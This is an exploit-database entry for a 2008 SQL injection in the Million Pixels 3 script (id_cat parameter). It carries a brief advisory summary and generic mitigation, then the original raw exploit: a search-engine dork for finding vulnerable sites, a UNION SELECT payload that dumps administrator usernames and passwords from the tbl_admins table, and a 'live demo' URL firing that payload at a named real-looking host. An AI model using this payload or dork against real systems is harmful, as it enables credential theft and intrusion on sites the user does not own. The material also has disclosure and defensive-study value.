Million Pixels 3 (id_cat) Remote SQL Injection Vulnerability

vendor:

Million Pixels 3

by:

Hussin X

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Million Pixels 3

Affected Version From: Million Pixels 3

Affected Version To: Million Pixels 3

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Million Pixels 3 (id_cat) Remote SQL Injection Vulnerability

Million Pixels 3 is vulnerable to a remote SQL injection vulnerability. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable script. This can allow an attacker to gain access to the database and potentially gain access to sensitive information.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.

Source

Exploit-DB raw data:

#################################################################
#
#   Million Pixels 3 (id_cat) Remote SQL Injection Vulnerability
#
#========================================================
#                                                       =
#    Author: Hussin X                                   =
#                                                       =
#    Home :  www.tryag.cc/cc
#                                                       =
#    email:  darkangel_g85[at]Yahoo[DoT]com             =
#                                                       =
#                                                       =
#========================================================
#     
# script : http://e-topbiz.com/oprema/pages/millionpixels3.php
#
# DorK  :  inurl: "tops_top.php? id_cat ="     
#################################################################

Exploit:  


www.[target].com/Script/tops_top.php?id_cat=-5/**/UNION/**/SELECT/**/1,concat_ws(0x3a,UserName,Password)/**/from/**/tbl_admins/*




L!VE DEMO:


http://e-topbiz.com/trafficdemos/pixel3/tops_top.php?id_cat=-5/**/UNION/**/SELECT/**/1,concat_ws(0x3a,UserName,Password)/**/from/**/tbl_admins/*




########################( Greetz )###########################
#                                                           #
# tryag.cc / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUR /str0ke    #
#                                                           #    
#         Iraqihack / FAHD / mos_chori / Silic0n            #
#                                                           #
#############################################################

                       Im IRAQi

# milw0rm.com [2008-07-11]